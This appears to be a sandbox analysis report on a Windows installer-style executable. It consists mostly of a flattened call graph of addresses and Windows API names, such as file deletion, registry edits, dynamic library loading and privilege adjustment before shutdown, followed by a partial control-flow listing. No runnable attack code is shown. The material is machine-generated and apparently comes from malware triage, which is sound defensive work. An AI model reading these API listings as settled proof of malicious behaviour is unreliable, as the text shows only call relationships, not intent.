4334->4337 4335->4337 4338 4059bc CharNextA 4335->4338 4336 4059e1 4336->4198 4336->4199 4337->4336 4339 405928 CharNextA 4337->4339 4338->4336 4339->4337 4341 40372e 4340->4341 4342 4036f8 4341->4342 4343 403733 FreeLibrary GlobalFree 4341->4343 4344 40572d 4342->4344 4343->4342 4343->4343 4345 4059eb 18 API calls 4344->4345 4346 40574d 4345->4346 4347 405755 DeleteFileA 4346->4347 4348 40576c 4346->4348 4349 403512 OleUninitialize 4347->4349 4350 4058a4 4348->4350 4384 405f65 lstrcpynA 4348->4384 4349->4027 4349->4028 4350->4349 4355 406268 2 API calls 4350->4355 4352 405792 4353 4057a5 4352->4353 4354 405798 lstrcatA 4352->4354 4356 405944 2 API calls 4353->4356 4358 4057ab 4354->4358 4357 4058be 4355->4357 4356->4358 4357->4349 4360 4058c2 4357->4360 4359 4057b9 lstrcatA 4358->4359 4361 4057c4 lstrlenA FindFirstFileA 4358->4361 4359->4361 4362 4058fd 3 API calls 4360->4362 4363 40589a 4361->4363 4382 4057e8 4361->4382 4364 4058c8 4362->4364 4363->4350 4366 4056e5 5 API calls 4364->4366 4365 405928 CharNextA 4365->4382 4367 4058d4 4366->4367 4368 4058d8 4367->4368 4369 4058ee 4367->4369 4368->4349 4374 40508c 24 API calls 4368->4374 4372 40508c 24 API calls 4369->4372 4370 405879 FindNextFileA 4373 405891 FindClose 4370->4373 4370->4382 4372->4349 4373->4363 4375 4058e5 4374->4375 4376 405d44 36 API calls 4375->4376 4379 4058ec 4376->4379 4378 40572d 60 API calls 4378->4382 4379->4349 4380 40508c 24 API calls 4380->4370 4381 40508c 24 API calls 4381->4382 4382->4365 4382->4370 4382->4378 4382->4380 4382->4381 4383 405d44 36 API calls 4382->4383 4385 405f65 lstrcpynA 4382->4385 4386 4056e5 4382->4386 4383->4382 4384->4352 4385->4382 4394 405ad9 GetFileAttributesA 4386->4394 4389 405700 RemoveDirectoryA 4392 40570e 4389->4392 4390 405708 DeleteFileA 4390->4392 4391 405712 4391->4382 4392->4391 4393 40571e SetFileAttributesA 4392->4393 4393->4391 4395 4056f1 4394->4395 4396 405aeb SetFileAttributesA 4394->4396 4395->4389 4395->4390 4395->4391 4396->4395 4999 406372 WaitForSingleObject 5000 40638c 4999->5000 5001 40639e GetExitCodeProcess 5000->5001 5002 406339 2 API calls 5000->5002 5003 406393 WaitForSingleObject 5002->5003 5003->5000 5004 403773 5005 40377e 5004->5005 5006 403782 5005->5006 5007 403785 GlobalAlloc 5005->5007 5007->5006 5008 100015b3 5009 100014bb GlobalFree 5008->5009 5011 100015cb 5009->5011 5010 10001611 GlobalFree 5011->5010 5012 100015e6 5011->5012 5013 100015fd VirtualFree 5011->5013 5012->5010 5013->5010 5014 4014f4 SetForegroundWindow 5015 402951 5014->5015 5016 401cf5 5017 402a9f 17 API calls 5016->5017 5018 401cfc 5017->5018 5019 402a9f 17 API calls 5018->5019 5020 401d08 GetDlgItem 5019->5020 5021 402577 5020->5021 4477 4022f6 4478 402304 4477->4478 4479 4022fe 4477->4479 4481 402314 4478->4481 4482 402ac1 17 API calls 4478->4482 4480 402ac1 17 API calls 4479->4480 4480->4478 4484 402ac1 17 API calls 4481->4484 4486 402322 4481->4486 4482->4481 4483 402ac1 17 API calls 4485 40232b WritePrivateProfileStringA 4483->4485 4484->4486 4486->4483 5022 4026f8 5023 402ac1 17 API calls 5022->5023 5024 4026ff FindFirstFileA 5023->5024 5025 402722 5024->5025 5029 402712 5024->5029 5026 402729 5025->5026 5030 405ec3 wsprintfA 5025->5030 5031 405f65 lstrcpynA 5026->5031 5030->5026 5031->5029 4529 40237b 4530 402382 4529->4530 4531 4023ad 4529->4531 4532 402b01 17 API calls 4530->4532 4533 402ac1 17 API calls 4531->4533 4534 402389 4532->4534 4535 4023b4 4533->4535 4536 402393 4534->4536 4540 4023c1 4534->4540 4541 402b7f 4535->4541 4538 402ac1 17 API calls 4536->4538 4539 40239a RegDeleteValueA RegCloseKey 4538->4539 4539->4540 4542 402b95 4541->4542 4543 402bab 4542->4543 4545 402bb4 4542->4545 4543->4540 4546 405deb RegOpenKeyExA 4545->4546 4547 402be2 4546->4547 4548 402c08 RegEnumKeyA 4547->4548 4549 402c1f RegCloseKey 4547->4549 4550 402c40 RegCloseKey 4547->4550 4552 402bb4 6 API calls 4547->4552 4554 402c33 4547->4554 4548->4547 4548->4549 4551 4062fd 5 API calls 4549->4551 4550->4554 4553 402c2f 4551->4553 4552->4547 4553->4554 4555 402c4e RegDeleteKeyA 4553->4555 4554->4543 4555->4554 4579 401ffd 4580 40200f 4579->4580 4582 4020bd 4579->4582 4581 402ac1 17 API calls 4580->4581 4584 402016 4581->4584 4583 401423 24 API calls 4582->4583 4589 40223c 4583->4589 4585 402ac1 17 API calls 4584->4585 4586 40201f 4585->4586 4587 402034 LoadLibraryExA 4586->4587 4588 402027 GetModuleHandleA 4586->4588 4587->4582 4590 402044 GetProcAddress 4587->4590 4588->4587 4588->4590 4591 402090 4590->4591 4592 402053 4590->4592 4593 40508c 24 API calls 4591->4593 4594 402072 4592->4594 4595 40205b 4592->4595 4596 402063 4593->4596 4600 100016bd 4594->4600 4597 401423 24 API calls 4595->4597 4596->4589 4598 4020b1 FreeLibrary 4596->4598 4597->4596 4598->4589 4601 100016ed 4600->4601 4642 10001a5d 4601->4642 4603 100016f4 4604 1000180a 4603->4604 4605 10001705 4603->4605 4606 1000170c 4603->4606 4604->4596 4690 100021b0 4605->4690 4674 100021fa 4606->4674 4611 10001770 4616 100017b2 4611->4616 4617 10001776 4611->4617 4612 10001752 4703 100023d8 4612->4703 4613 10001722 4615 10001728 4613->4615 4620 10001733 4613->4620 4614 1000173b 4626 10001731 4614->4626 4700 10002a9f 4614->4700 4615->4626 4684 100027e4 4615->4684 4624 100023d8 11 API calls 4616->4624 4622 10001559 3 API calls 4617->4622 4619 10001758 4714 10001559 4619->4714 4694 10002587 4620->4694 4628 1000178c 4622->4628 4629 100017a4 4624->4629 4626->4611 4626->4612 4632 100023d8 11 API calls 4628->4632 4641 100017f9 4629->4641 4725 1000239e 4629->4725 4631 10001739 4631->4626 4632->4629 4636 10001803 GlobalFree 4636->4604 4638 100017e5 4638->4641 4729 100014e2 wsprintfA 4638->4729 4639 100017de FreeLibrary 4639->4638 4641->4604 4641->4636 4732 10001215 GlobalAlloc 4642->4732 4644 10001a81 4733 10001215 GlobalAlloc 4644->4733 4646 10001cbb GlobalFree GlobalFree GlobalFree 4647 10001cd8 4646->4647 4656 10001d22 4646->4656 4648 1000201a 4647->4648 4647->4656 4657 10001ced 4647->4657 4651 1000203c GetModuleHandleA 4648->4651 4648->4656 4649 10001b60 GlobalAlloc 4650 10001a8c 4649->4650 4650->4646 4650->4649 4652 10001bab lstrcpyA 4650->4652 4653 10001bc9 GlobalFree 4650->4653 4650->4656 4658 10001bb5 lstrcpyA 4650->4658 4661 10001f7a 4650->4661 4667 10001c07 4650->4667 4668 10001e75 GlobalFree 4650->4668 4672 10001224 2 API calls 4650->4672 4739 10001215 GlobalAlloc 4650->4739 4654 10002062 4651->4654 4655 1000204d LoadLibraryA 4651->4655 4652->4658 4653->4650 4740 100015a4 GetProcAddress 4654->4740 4655->4654 4655->4656 4656->4603 4657->4656 4736 10001224 4657->4736 4658->4650 4660 100020b3 4660->4656 4662 100020c0 lstrlenA 4660->4662 4661->4656 4666 10001fbe lstrcpyA 4661->4666 4741 100015a4 GetProcAddress 4662->4741 4666->4656 4667->4650 4734 10001534 GlobalSize GlobalAlloc 4667->4734 4668->4650 4669 10002074 4669->4660 4673 1000209d GetProcAddress 4669->4673 4670 100020d9 4670->4656 4672->4650 4673->4660 4682 10002212 4674->4682 4676 10002347 GlobalFree 4677 10001712 4676->4677 4676->4682 4677->4613 4677->4614 4677->4626 4678 100022bb GlobalAlloc MultiByteToWideChar 4680 100022e5 GlobalAlloc CLSIDFromString GlobalFree 4678->4680 4681 10002306 4678->4681 4679 10001224 GlobalAlloc lstrcpynA 4679->4682 4680->4676 4681->4676 4747 1000251b 4681->4747 4682->4676 4682->4678 4682->4679 4682->4681 4743 100012ad 4682->4743 4687 100027f6 4684->4687 4685 1000289b ReadFile 4686 100028b9 4685->4686 4688 100029b5 4686->4688 4689 100029aa GetLastError 4686->4689 4687->4685 4688->4626 4689->4688 4691 100021c0 4690->4691 4692 1000170b 4690->4692 4691->4692 4693 100021d2 GlobalAlloc 4691->4693 4692->4606 4693->4691 4698 100025a3 4694->4698 4695 100025f4 GlobalAlloc 4699 10002616 4695->4699 4696 10002607 4697 1000260c GlobalSize 4696->4697 4696->4699 4697->4699 4698->4695 4698->4696 4699->4631 4701 10002aaa 4700->4701 4702 10002aea GlobalFree 4701->4702 4750 10001215 GlobalAlloc 4703->4750 4705 10002438 lstrcpynA 4712 100023e4 4705->4712 4706 10002449 StringFromGUID2 WideCharToMultiByte 4706->4712 4707 1000246d WideCharToMultiByte 4707->4712 4708 100024b2 GlobalFree 4708->4712 4709 1000248e wsprintfA 4709->4712 4710 100024ec GlobalFree 4710->4619 4711 10001266 2 API calls 4711->4712 4712->4705 4712->4706 4712->4707 4712->4708 4712->4709 4712->4710 4712->4711 4751 100012d1 4712->4751 4755 10001215 GlobalAlloc 4714->4755 4716 1000155f 4717 1000156c lstrcpyA 4716->4717 4719 10001586 4716->4719 4720 100015a0 4717->4720 4719->4720 4721 1000158b wsprintfA 4719->4721 4722 10001266 4720->4722 4721->4720 4723 100012a8 GlobalFree 4722->4723 4724 1000126f GlobalAlloc lstrcpynA 4722->4724 4723->4629 4724->4723 4726 100023ac 4725->4726 4728 100017c5 4725->4728 4727 100023c5 GlobalFree 4726->4727 4726->4728 4727->4726 4728->4638 4728->4639 4730 10001266 2 API calls 4729->4730 4731 10001503 4730->4731 4731->4641 4732->4644 4733->4650 4735 10001552 4734->4735 4735->4667 4742 10001215 GlobalAlloc 4736->4742 4738 10001233 lstrcpynA 4738->4656 4739->4650 4740->4669 4741->4670 4742->4738 4744 100012b4 4743->4744 4745 10001224 2 API calls 4744->4745 4746 100012cf 4745->4746 4746->4682 4748 10002529 VirtualAlloc 4747->4748 4749 1000257f 4747->4749 4748->4749 4749->4681 4750->4712 4752 100012f9 4751->4752 4753 100012da 4751->4753 4752->4712 4753->4752 4754 100012e0 lstrcpyA 4753->4754 4754->4752 4755->4716 5032 1000103d 5033 1000101b 5 API calls 5032->5033 5034 10001056 5033->5034 5035 4018fd 5036 401934 5035->5036 5037 402ac1 17 API calls 5036->5037 5038 401939 5037->5038 5039 40572d 67 API calls 5038->5039 5040 401942 5039->5040 5041 40257d 5042 402582 5041->5042 5043 402596 5041->5043 5044 402a9f 17 API calls 5042->5044 5045 402ac1 17 API calls 5043->5045 5047 40258b 5044->5047 5046 40259d lstrlenA 5045->5046 5046->5047 5048 4025bf 5047->5048 5049 405ba5 WriteFile 5047->5049 5049->5048 5050 100029bf 5051 100029d7 5050->5051 5052 10001534 2 API calls 5051->5052 5053 100029f2 5052->5053 5054 401000 5055 401037 BeginPaint GetClientRect 5054->5055 5056 40100c DefWindowProcA 5054->5056 5058 4010f3 5055->5058 5059 401179 5056->5059 5060 401073 CreateBrushIndirect FillRect DeleteObject 5058->5060 5061 4010fc 5058->5061 5060->5058 5062 401102 CreateFontIndirectA 5061->5062 5063 401167 EndPaint 5061->5063 5062->5063 5064 401112 6 API calls 5062->5064 5063->5059 5064->5063 5065 405000 5066 405010 5065->5066 5067 405024 5065->5067 5068 405016 5066->5068 5077 40506d 5066->5077 5069 40502c IsWindowVisible 5067->5069 5073 405043 5067->5073 5071 404072 SendMessageA 5068->5071 5072 405039 5069->5072 5069->5077 5070 405072 CallWindowProcA 5074 405020 5070->5074 5071->5074 5078 404957 SendMessageA 5072->5078 5073->5070 5083 4049d7 5073->5083 5077->5070 5079 4049b6 SendMessageA 5078->5079 5080 40497a GetMessagePos ScreenToClient SendMessageA 5078->5080 5082 4049ae 5079->5082 5081 4049b3 5080->5081 5080->5082 5081->5079 5082->5073 5092 405f65 lstrcpynA 5083->5092 5085 4049ea 5093 405ec3 wsprintfA 5085->5093 5087 4049f4 5088 40140b 2 API calls 5087->5088 5089 4049fd 5088->5089 5094 405f65 lstrcpynA 5089->5094 5091 404a04 5091->5077 5092->5085 5093->5087 5094->5091 5095 401900 5096 402ac1 17 API calls 5095->5096 5097 401907 5096->5097 5098 405681 MessageBoxIndirectA 5097->5098 5099 401910 5098->5099 3699 402682 3700 402689 3699->3700 3706 4028fe 3699->3706 3707 402a9f 3700->3707 3702 402690 3703 40269f SetFilePointer 3702->3703 3704 4026af 3703->3704 3703->3706 3710 405ec3 wsprintfA 3704->3710 3711 405f87 3707->3711 3709 402ab4 3709->3702 3710->3706 3725 405f94 3711->3725 3712 4061b6 3713 4061cb 3712->3713 3744 405f65 lstrcpynA 3712->3744 3713->3709 3715 406190 lstrlenA 3715->3725 3717 405f87 10 API calls 3717->3715 3720 4060ac GetSystemDirectoryA 3720->3725 3721 4060bf GetWindowsDirectoryA 3721->3725 3723 405f87 10 API calls 3723->3725 3724 406139 lstrcatA 3724->3725 3725->3712 3725->3715 3725->3717 3725->3720 3725->3721 3725->3723 3725->3724 3726 4060f3 SHGetSpecialFolderLocation 3725->3726 3728 405e4c 3725->3728 3733 4061cf 3725->3733 3742 405ec3 wsprintfA 3725->3742 3743 405f65 lstrcpynA 3725->3743 3726->3725 3727 40610b SHGetPathFromIDListA CoTaskMemFree 3726->3727 3727->3725 3745 405deb 3728->3745 3731 405e80 RegQueryValueExA RegCloseKey 3732 405eaf 3731->3732 3732->3725 3739 4061db 3733->3739 3734 406243 3735 406247 CharPrevA 3734->3735 3737 406262 3734->3737 3735->3734 3736 406238 CharNextA 3736->3734 3736->3739 3737->3725 3739->3734 3739->3736 3740 406226 CharNextA 3739->3740 3741 406233 CharNextA 3739->3741 3749 405928 3739->3749 3740->3739 3741->3736 3742->3725 3743->3725 3744->3713 3746 405dfa 3745->3746 3747 405e03 RegOpenKeyExA 3746->3747 3748 405dfe 3746->3748 3747->3748 3748->3731 3748->3732 3750 40592e 3749->3750 3751 405941 3750->3751 3752 405934 CharNextA 3750->3752 3751->3739 3752->3750 5100 401502 5101 40150a 5100->5101 5103 40151d 5100->5103 5102 402a9f 17 API calls 5101->5102 5102->5103 3765 401c04 3766 402a9f 17 API calls 3765->3766 3767 401c0b 3766->3767 3768 402a9f 17 API calls 3767->3768 3769 401c18 3768->3769 3770 401c2d 3769->3770 3771 402ac1 17 API calls 3769->3771 3772 401c3d 3770->3772 3775 402ac1 17 API calls 3770->3775 3771->3770 3773 401c94 3772->3773 3774 401c48 3772->3774 3787 402ac1 3773->3787 3776 402a9f 17 API calls 3774->3776 3775->3772 3778 401c4d 3776->3778 3780 402a9f 17 API calls 3778->3780 3782 401c59 3780->3782 3781 402ac1 17 API calls 3783 401ca2 FindWindowExA 3781->3783 3784 401c84 SendMessageA 3782->3784 3785 401c66 SendMessageTimeoutA 3782->3785 3786 401cc0 3783->3786 3784->3786 3785->3786 3788 402acd 3787->3788 3789 405f87 17 API calls 3788->3789 3790 402aee 3789->3790 3791 401c99 3790->3791 3792 4061cf 5 API calls 3790->3792 3791->3781 3792->3791 5104 404a09 GetDlgItem GetDlgItem 5105 404a5b 7 API calls 5104->5105 5112 404c73 5104->5112 5106 404af1 SendMessageA 5105->5106 5107 404afe DeleteObject 5105->5107 5106->5107 5108 404b07 5107->5108 5109 404b3e 5108->5109 5111 405f87 17 API calls 5108->5111 5113 404026 18 API calls 5109->5113 5110 404e03 5116 404e15 5110->5116 5117 404e0d SendMessageA 5110->5117 5118 404b20 SendMessageA SendMessageA 5111->5118 5115 404d57 5112->5115 5123 404957 5 API calls 5112->5123 5137 404ce4 5112->5137 5114 404b52 5113->5114 5119 404026 18 API calls 5114->5119 5115->5110 5120 404db0 SendMessageA 5115->5120 5144 404c66 5115->5144 5126 404e27 ImageList_Destroy 5116->5126 5127 404e2e 5116->5127 5140 404e3e 5116->5140 5117->5116 5118->5108 5138 404b60 5119->5138 5124 404dc5 SendMessageA 5120->5124 5120->5144 5121 40408d 8 API calls 5125 404ff9 5121->5125 5122 404d49 SendMessageA 5122->5115 5123->5137 5130 404dd8 5124->5130 5126->5127 5128 404e37 GlobalFree 5127->5128 5127->5140 5128->5140 5129 404c34 GetWindowLongA SetWindowLongA 5133 404c4d 5129->5133 5141 404de9 SendMessageA 5130->5141 5131 404fad 5132 404fbf ShowWindow GetDlgItem ShowWindow 5131->5132 5131->5144 5132->5144 5134 404c53 ShowWindow 5133->5134 5135 404c6b 5133->5135 5155 40405b SendMessageA 5134->5155 5156 40405b SendMessageA 5135->5156 5137->5115 5137->5122 5138->5129 5139 404baf SendMessageA 5138->5139 5142 404c2e 5138->5142 5145 404beb SendMessageA 5138->5145 5146 404bfc SendMessageA 5138->5146 5139->5138 5140->5131 5147 4049d7 4 API calls 5140->5147 5151 404e79 5140->5151 5141->5110 5142->5129 5142->5133 5144->5121 5145->5138 5146->5138 5147->5151 5148 404f83 InvalidateRect 5148->5131 5149 404f99 5148->5149 5157 404912 5149->5157 5150 404ea7 SendMessageA 5154 404ebd 5150->5154 5151->5150 5151->5154 5153 404f31 SendMessageA SendMessageA 5153->5154 5154->5148 5154->5153 5155->5144 5156->5112 5160 40484d 5157->5160 5159 404927 5159->5131 5161 404863 5160->5161 5162 405f87 17 API calls 5161->5162 5163 4048c7 5162->5163 5164 405f87 17 API calls 5163->5164 5165 4048d2 5164->5165 5166 405f87 17 API calls 5165->5166 5167 4048e8 lstrlenA wsprintfA SetDlgItemTextA 5166->5167 5167->5159 5168 401490 5169 40508c 24 API calls 5168->5169 5170 401497 5169->5170 5171 401d95 GetDC 5172 402a9f 17 API calls 5171->5172 5173 401da7 GetDeviceCaps MulDiv ReleaseDC 5172->5173 5174 402a9f 17 API calls 5173->5174 5175 401dd8 5174->5175 5176 405f87 17 API calls 5175->5176 5177 401e15 CreateFontIndirectA 5176->5177 5178 402577 5177->5178 5179 404496 5180 4044c2 5179->5180 5181 4044d3 5179->5181 5240 405665 GetDlgItemTextA 5180->5240 5182 4044df GetDlgItem 5181->5182 5189 40453e 5181->5189 5185 4044f3 5182->5185 5184 4044cd 5187 4061cf 5 API calls 5184->5187 5188 404507 SetWindowTextA 5185->5188 5192 405996 4 API calls 5185->5192 5186 404622 5237 4047cc 5186->5237 5242 405665 GetDlgItemTextA 5186->5242 5187->5181 5193 404026 18 API calls 5188->5193 5189->5186 5194 405f87 17 API calls 5189->5194 5189->5237 5191 40408d 8 API calls 5196 4047e0 5191->5196 5197 4044fd 5192->5197 5198 404523 5193->5198 5199 4045b2 SHBrowseForFolderA 5194->5199 5195 404652 5200 4059eb 18 API calls 5195->5200 5197->5188 5204 4058fd 3 API calls 5197->5204 5201 404026 18 API calls 5198->5201 5199->5186 5202 4045ca CoTaskMemFree 5199->5202 5203 404658 5200->5203 5205 404531 5201->5205 5206 4058fd 3 API calls 5202->5206 5243 405f65 lstrcpynA 5203->5243 5204->5188 5241 40405b SendMessageA 5205->5241 5208 4045d7 5206->5208 5211 40460e SetDlgItemTextA 5208->5211 5215 405f87 17 API calls 5208->5215 5210 404537 5213 4062fd 5 API calls 5210->5213 5211->5186 5212 40466f 5214 4062fd 5 API calls 5212->5214 5213->5189 5222 404676 5214->5222 5216 4045f6 lstrcmpiA 5215->5216 5216->5211 5218 404607 lstrcatA 5216->5218 5217 4046b2 5244 405f65 lstrcpynA 5217->5244 5218->5211 5220 4046b9 5221 405996 4 API calls 5220->5221 5223 4046bf GetDiskFreeSpaceA 5221->5223 5222->5217 5226 405944 2 API calls 5222->5226 5227 40470a 5222->5227 5225 4046e3 MulDiv 5223->5225 5223->5227 5225->5227 5226->5222 5228 404912 20 API calls 5227->5228 5238 40477b 5227->5238 5230 404768 5228->5230 5229 40479e 5245 404048 KiUserCallbackDispatcher 5229->5245 5232 40477d SetDlgItemTextA 5230->5232 5233 40476d 5230->5233 5231 40140b 2 API calls 5231->5229 5232->5238 5235 40484d 20 API calls 5233->5235 5235->5238 5236 4047ba 5236->5237 5239 4043ef SendMessageA 5236->5239 5237->5191 5238->5229 5238->5231 5239->5237 5240->5184 5241->5210 5242->5195 5243->5212 5244->5220 5245->5236 5246 10001058 5248 10001074 5246->5248 5247 100010dc 5248->5247 5249 100014bb GlobalFree 5248->5249 5250 10001091 5248->5250 5249->5250 5251 100014bb GlobalFree 5250->5251 5252 100010a1 5251->5252 5253 100010b1 5252->5253 5254 100010a8 GlobalSize 5252->5254 5255 100010b5 GlobalAlloc 5253->5255 5256 100010c6 5253->5256 5254->5253 5257 100014e2 3 API calls 5255->5257 5258 100010d1 GlobalFree 5256->5258 5257->5256 5258->5247 5259 401d1a 5260 402a9f 17 API calls 5259->5260 5261 401d28 SetWindowLongA 5260->5261 5262 402951 5261->5262 4756 40159d 4757 402ac1 17 API calls 4756->4757 4758 4015a4 SetFileAttributesA 4757->4758 4759 4015b6 4758->4759 5268 40149d 5269 4014ab PostQuitMessage 5268->5269 5270 4022e1 5268->5270 5269->5270 5271 401a1e 5272 402ac1 17 API calls 5271->5272 5273 401a27 ExpandEnvironmentStringsA 5272->5273 5274 401a3b 5273->5274 5276 401a4e 5273->5276 5275 401a40 lstrcmpA 5274->5275 5274->5276 5275->5276 5277 40171f 5278 402ac1 17 API calls 5277->5278 5279 401726 SearchPathA 5278->5279 5280 401741 5279->5280 5281 100010e0 5282 1000110e 5281->5282 5283 100011c4 GlobalFree 5282->5283 5284 100012ad 2 API calls 5282->5284 5285 100011c3 5282->5285 5286 10001266 2 API calls 5282->5286 5287 10001155 GlobalAlloc 5282->5287 5288 100011ea GlobalFree 5282->5288 5289 100011b1 GlobalFree 5282->5289 5290 100012d1 lstrcpyA 5282->5290 5284->5282 5285->5283 5286->5289 5287->5282 5288->5282 5289->5282 5290->5282 5291 10002162 5292 100021c0 5291->5292 5293 100021f6 5291->5293 5292->5293 5294 100021d2 GlobalAlloc 5292->5294 5294->5292 3822 401e25 3823 402a9f 17 API calls 3822->3823 3824 401e2b 3823->3824 3825 402a9f 17 API calls 3824->3825 3826 401e37 3825->3826 3827 401e43 ShowWindow 3826->3827 3828 401e4e EnableWindow 3826->3828 3829 402951 3827->3829 3828->3829 5295 401f2b 5296 402ac1 17 API calls 5295->5296 5297 401f32 5296->5297 5298 406268 2 API calls 5297->5298 5299 401f38 5298->5299 5301 401f4a 5299->5301 5302 405ec3 wsprintfA 5299->5302 5302->5301 5303 40292c SendMessageA 5304 402951 5303->5304 5305 402946 InvalidateRect 5303->5305 5305->5304 5306 4026b4 5307 4026ba 5306->5307 5308 402951 5307->5308 5309 4026c2 FindClose 5307->5309 5309->5308 5310 402736 5311 402ac1 17 API calls 5310->5311 5312 402744 5311->5312 5313 40275a 5312->5313 5314 402ac1 17 API calls 5312->5314 5315 405ad9 2 API calls 5313->5315 5314->5313 5316 402760 5315->5316 5338 405afe GetFileAttributesA CreateFileA 5316->5338 5318 40276d 5319 402816 5318->5319 5320 402779 GlobalAlloc 5318->5320 5323 402831 5319->5323 5324 40281e DeleteFileA 5319->5324 5321 402792 5320->5321 5322 40280d CloseHandle 5320->5322 5339 4031a9 SetFilePointer 5321->5339 5322->5319 5324->5323 5326 402798 5327 403193 ReadFile 5326->5327 5328 4027a1 GlobalAlloc 5327->5328 5329 4027b1 5328->5329 5330 4027eb 5328->5330 5331 402f81 31 API calls 5329->5331 5332 405ba5 WriteFile 5330->5332 5337 4027be 5331->5337 5333 4027f7 GlobalFree 5332->5333 5334 402f81 31 API calls 5333->5334 5335 40280a 5334->5335 5335->5322 5336 4027e2 GlobalFree 5336->5330 5337->5336 5338->5318 5339->5326 5340 402837 5341 402a9f 17 API calls 5340->5341 5342 40283d 5341->5342 5343 402865 5342->5343 5344 40287c 5342->5344 5349 402716 5342->5349 5345 402879 5343->5345 5346 40286a 5343->5346 5347 402896 5344->5347 5348 402886 5344->5348 5355 405ec3 wsprintfA 5345->5355 5354 405f65 lstrcpynA 5346->5354 5351 405f87 17 API calls 5347->5351 5350 402a9f 17 API calls 5348->5350 5350->5349 5351->5349 5354->5349 5355->5349 5356 4014b7 5357 4014bd 5356->5357 5358 401389 2 API calls 5357->5358 5359 4014c5 5358->5359 5360 401b39 5361 402ac1 17 API calls 5360->5361 5362 401b40 5361->5362 5363 402a9f 17 API calls 5362->5363 5364 401b49 wsprintfA 5363->5364 5365 402951 5364->5365 5366 40413a lstrcpynA lstrlenA 5367 40233a 5368 402ac1 17 API calls 5367->5368 5369 40234b 5368->5369 5370 402ac1 17 API calls 5369->5370 5371 402354 5370->5371 5372 402ac1 17 API calls 5371->5372 5373 40235e GetPrivateProfileStringA 5372->5373 4556 4015bb 4557 402ac1 17 API calls 4556->4557 4558 4015c2 4557->4558 4559 405996 4 API calls 4558->4559 4571 4015ca 4559->4571 4560 401624 4562 401652 4560->4562 4563 401629 4560->4563 4561 405928 CharNextA 4561->4571 4565 401423 24 API calls 4562->4565 4575 401423 4563->4575 4572 40164a 4565->4572 4568 4055cf 2 API calls 4568->4571 4569 4055ec 5 API calls 4569->4571 4570 40163b SetCurrentDirectoryA 4570->4572 4571->4560 4571->4561 4571->4568 4571->4569 4573 40160c GetFileAttributesA 4571->4573 4574 405552 4 API calls 4571->4574 4573->4571 4574->4571 4576 40508c 24 API calls 4575->4576 4577 401431 4576->4577 4578 405f65 lstrcpynA 4577->4578 4578->4570 5374 4016bb 5375 402ac1 17 API calls 5374->5375 5376 4016c1 GetFullPathNameA 5375->5376 5377 4016d8 5376->5377 5378 4016f9 5376->5378 5377->5378 5381 406268 2 API calls 5377->5381 5379 402951 5378->5379 5380 40170d GetShortPathNameA 5378->5380 5380->5379 5382 4016e9 5381->5382 5382->5378 5384 405f65 lstrcpynA 5382->5384 5384->5378 5385 401d3b GetDlgItem GetClientRect 5386 402ac1 17 API calls 5385->5386 5387 401d6b LoadImageA SendMessageA 5386->5387 5388 402951 5387->5388 5389 401d89 DeleteObject 5387->5389 5389->5388

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 004031F1 Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 368stringcomfileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 4031f1-403230 SetErrorMode GetVersion 1 403232-40323a call 4062fd 0->1 2 403243 0->2 1->2 8 40323c 1->8 3 403248-40325b call 40628f lstrlenA 2->3 9 40325d-403279 call 4062fd * 3 3->9 8->2 16 40328a-4032ea #17 OleInitialize SHGetFileInfoA call 405f65 GetCommandLineA call 405f65 GetModuleHandleA 9->16 17 40327b-403281 9->17 24 4032f6-40330b call 405928 CharNextA 16->24 25 4032ec-4032f1 16->25 17->16 22 403283 17->22 22->16 28 4033d0-4033d4 24->28 25->24 29 403310-403313 28->29 30 4033da 28->30 31 403315-403319 29->31 32 40331b-403323 29->32 33 4033ed-403407 GetTempPathA call 4031c0 30->33 31->31 31->32 35 403325-403326 32->35 36 40332b-40332e 32->36 40 403409-403427 GetWindowsDirectoryA lstrcatA call 4031c0 33->40 41 40345f-403479 DeleteFileA call 402d48 33->41 35->36 38 4033c0-4033cd call 405928 36->38 39 403334-403338 36->39 38->28 57 4033cf 38->57 43 403350-40337d 39->43 44 40333a-403340 39->44 40->41 58 403429-403459 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031c0 40->58 59 40350d-40351d call 4036db OleUninitialize 41->59 60 40347f-403485 41->60 48 403390-4033be 43->48 49 40337f-403385 43->49 45 403342-403344 44->45 46 403346 44->46 45->43 45->46 46->43 48->38 55 4033dc-4033e8 call 405f65 48->55 53 403387-403389 49->53 54 40338b 49->54 53->48 53->54 54->48 55->33 57->28 58->41 58->59 70 403641-403647 59->70 71 403523-403533 call 405681 ExitProcess 59->71 63 403487-403492 call 405928 60->63 64 4034fd-403504 call 4037b5 60->64 77 403494-4034bd 63->77 78 4034c8-4034d2 63->78 72 403509 64->72 75 4036c3-4036cb 70->75 76 403649-403662 GetCurrentProcess OpenProcessToken 70->76 72->59 80 4036d1-4036d5 ExitProcess 75->80 81 4036cd 75->81 85 403694-4036a2 call 4062fd 76->85 86 403664-40368e LookupPrivilegeValueA AdjustTokenPrivileges 76->86 79 4034bf-4034c1 77->79 83 4034d4-4034e1 call 4059eb 78->83 84 403539-40354d call 4055ec lstrcatA 78->84 79->78 87 4034c3-4034c6 79->87 81->80 83->59 94 4034e3-4034f9 call 405f65 * 2 83->94 95 40355a-403574 lstrcatA lstrcmpiA 84->95 96 40354f-403555 lstrcatA 84->96 97 4036b0-4036ba ExitWindowsEx 85->97 98 4036a4-4036ae 85->98 86->85 87->78 87->79 94->64 95->59 100 403576-403579 95->100 96->95 97->75 101 4036bc-4036be call 40140b 97->101 98->97 98->101 104 403582 call 4055cf 100->104 105 40357b-403580 call 405552 100->105 101->75 112 403587-403594 SetCurrentDirectoryA 104->112 105->112 113 4035a1-4035c9 call 405f65 112->113 114 403596-40359c call 405f65 112->114 118 4035cf-4035eb call 405f87 DeleteFileA 113->118 114->113 121 40362c-403633 118->121 122 4035ed-4035fd CopyFileA 118->122 121->118 123 403635-40363c call 405d44 121->123 122->121 124 4035ff-403618 call 405d44 call 405f87 call 405604 122->124 123->59 132 40361d-40361f 124->132 132->121 133 403621-403628 CloseHandle 132->133 133->121
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNELBASE ref: 00403216
                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 0040321C
                                                                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040324F
